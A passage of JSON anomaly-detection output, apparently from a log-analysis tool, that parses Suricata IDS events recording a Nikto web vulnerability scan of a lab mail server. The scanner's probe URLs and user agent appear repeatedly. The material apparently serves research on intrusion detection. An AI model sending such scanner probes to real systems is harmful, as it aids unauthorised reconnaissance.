"/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":124996417115902,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 124996417115902, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.154766+0000\",\"flow_id\":124996417115902,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SSIFilter\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SSIFilter\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], 
"Timestamps": [ 1583349514.15 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.156769 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46772 -> 192.168.10.154:80", "/parser/model/time": 1583349514.156769, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46772, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.156769 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46772 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.TXT", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.156961+0000\",\"flow_id\":1001345839161358,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TXT\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TXT\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.156961, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1001345839161358,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TXT\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TXT\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TXT\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TXT\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.TXT\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.TXT\",", 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.TXT", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.TXT", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": 
"\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46772, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1001345839161358,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1001345839161358, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.156961+0000\",\"flow_id\":1001345839161358,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TXT\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TXT\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.159041 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46774 -> 192.168.10.154:80", "/parser/model/time": 1583349514.159041, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46774, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.159041 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by 
non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46774 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA._", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.159362+0000\",\"flow_id\":2036518856845440,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA._\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA._\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.159362, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2036518856845440,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 
"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA._\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA._\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA._\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA._\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA._\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", 
"/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA._\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA._", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA._", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", 
"/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46774, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2036518856845440,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2036518856845440, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.159362+0000\",\"flow_id\":2036518856845440,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA._\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA._\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.162334 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46776 -> 192.168.10.154:80", "/parser/model/time": 1583349514.162334, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46776, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.162334 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46776 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.rdf+destype=cache+desformat=PDF", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.162552+0000\",\"flow_id\":1625615040672730,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.162552, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1625615040672730,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": 
"\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.rdf+destype=cache+desformat=PDF", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.rdf+destype=cache+desformat=PDF", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", 
